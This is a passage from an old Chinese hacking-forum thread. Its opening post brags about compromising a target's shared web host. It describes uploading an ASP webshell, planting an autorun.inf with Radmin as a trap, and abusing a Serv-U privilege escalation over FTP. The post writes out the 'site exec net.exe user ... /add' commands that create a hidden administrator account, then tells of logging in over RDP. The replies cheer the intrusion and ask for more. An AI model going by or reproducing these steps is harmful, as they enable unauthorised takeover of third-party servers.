|
作者: lz [lz] 论坛用户 | 登录 |
目标机器dvbbs 7.0 sp2没有找到漏洞.用老兵的虚拟主机查看工具..查到一个dvbbs6。0 上船海洋asp木马 上去发现没有权限..限制了asp木马权限...做了个autorun.inf+radmin。。放在根目录.n天发现管理员没有点..ftp..www.XXX.com serv-u得 想到有本地提升权限的漏洞.找了个工具,上传运行加了个ftp用户..ftp ..www.XXX.com quote site exec net.exe user test test /add quote site exec net.exe localgroup administrators test /add 命令成功 (主机开了3389 )于是登录 ...ok 找到了目标机的主业存放地点......... |
地主 发表时间: 04-10-07 10:27 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
你的说法也够简单啊 管理员也忒厉害了1 |
B1层 发表时间: 04-10-07 13:35 |
回复: lr850124 [lr850124] 论坛用户 | 登录 |
哈哈 搞笑 |
B2层 发表时间: 04-10-07 15:10 |
回复: hackerjune [hackerjune] 论坛用户 | 登录 |
门前入侵 有后文吗,我想看看你在入侵后是怎么做的 |
B3层 发表时间: 04-10-07 16:42 |
回复: iokaaa [iokaaa] 论坛用户 | 登录 |
那样也行啊,哈哈 |
B4层 发表时间: 04-10-08 17:01 |
回复: qmdjzgqt [qmdjzgqt] 论坛用户 | 登录 |
入侵就这样简单?呵呵......我以后在也不学了 |
B5层 发表时间: 04-10-08 21:28 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号